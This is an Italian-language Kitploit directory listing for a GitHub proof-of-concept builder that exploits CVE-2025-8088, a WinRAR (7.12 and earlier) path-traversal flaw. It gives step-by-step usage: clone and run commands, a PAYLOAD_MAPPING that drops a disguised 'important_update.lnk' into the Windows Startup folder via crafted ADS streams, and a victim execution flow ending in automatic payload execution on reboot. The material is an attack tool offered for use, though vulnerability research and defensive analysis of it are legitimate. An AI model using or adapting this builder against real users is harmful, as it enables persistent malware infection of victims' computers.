Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebAnalisi MalwareSviluppo Payload
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Un exploit POC per la vulnerabilità di WinRAR (CVE-2025-8088) che interessa le versioni 7.12 e precedenti

Vedi Repository
110 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8088-WinRAR-builder

Un POC exploit per la vulnerabilità di WinRAR (CVE-2025-8088) che interessa le versioni 7.12 e precedenti

🚀 Come Funziona

  1. Crea un archivio RAR incorporato con altri payload
  2. Utilizza più flussi ADS 🔄 - Aggiunge flussi di payload con diverse profondità di path traversal
  3. Manipola le intestazioni RAR ⚙️ - Modifica la struttura dell'archivio per sfruttare la vulnerabilità di path traversal
  4. Rilascia il Payload nella cartella di Avvio 📂 - Tenta di scrivere il payload nella cartella di avvio di Windows quando viene estratto

🛠️ Utilizzo

  1. Clona il repository
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Prepara i payload
root@kitploit:~
mkdir payloads
  • Aggiungi i tuoi payload in quella cartella (exe, dll, lnk, ...)
  • Modifica PAYLOAD_MAPPING nello script
root@kitploit:~
# 2. Mappa il payload alla destinazione corrispondente
#   Formato: (nome_file_in_payloads_dir, destinazione_estrazione_target)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Aggiungi il tuo
]
  1. Esegui l'exploit
root@kitploit:~
python builder.py <decoy_file>

🔄 Flusso di Esecuzione

  1. La vittima estrae il RAR con WinRAR vulnerabile (≤7.12)
  2. Il payload viene scritto nella cartella di destinazione, ad esempio:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Al successivo riavvio ➡️ il payload viene eseguito automaticamente

📋 Requisiti

  • Sistema operativo Windows 🪟
  • Python 3.x 🐍
  • WinRAR installato
Scarica lo strumento